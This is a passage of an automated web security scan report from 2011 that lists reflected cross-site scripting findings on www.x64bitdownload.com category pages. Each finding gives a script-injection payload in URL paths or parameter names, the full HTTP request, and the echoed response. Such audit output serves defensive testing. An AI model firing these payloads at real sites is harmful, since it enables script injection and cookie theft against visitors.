<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d" /> ...[SNIP]...
1.164. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6f5"><script>alert(1)</script>37142a6112a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:27:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:37:53 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ff"><script>alert(1)</script>aaabc5d7835 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:32:29 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25089"><script>alert(1)</script>5548c734076 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:33:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:52 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076" /> ...[SNIP]...
1.167. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41d5"><script>alert(1)</script>6359a8cd029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:28:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:38:24 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6549"><script>alert(1)</script>b1e5c16342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:30:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe78"><script>alert(1)</script>a8e92c56ad6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:31:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:42:03 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6" /> ...[SNIP]...
1.170. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b7b"><script>alert(1)</script>a8d922c9ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:28:07 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:38:15 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed3a"><script>alert(1)</script>e871d75a71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:32:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d39"><script>alert(1)</script>36b459a9d64 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:07 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64" /> ...[SNIP]...
1.173. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e19f5"><script>alert(1)</script>e0881237aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:29:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:39:45 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77035
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40541"><script>alert(1)</script>0a50b7a4e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:33:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597b7"><script>alert(1)</script>5a1bd81061d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:33 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d" /> ...[SNIP]...
1.176. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6254b"><script>alert(1)</script>08a105a460f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:30:03 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:40:25 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38933"><script>alert(1)</script>a091c5ce1f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:32:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880f5"><script>alert(1)</script>ffef72251bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:06 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb" /> ...[SNIP]...
1.179. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afba"><script>alert(1)</script>952a07404a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:29:36 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:39:50 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab8db"><script>alert(1)</script>a8017a7f1a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:30:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e91c"><script>alert(1)</script>e48652f16c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:32:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:15 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81574
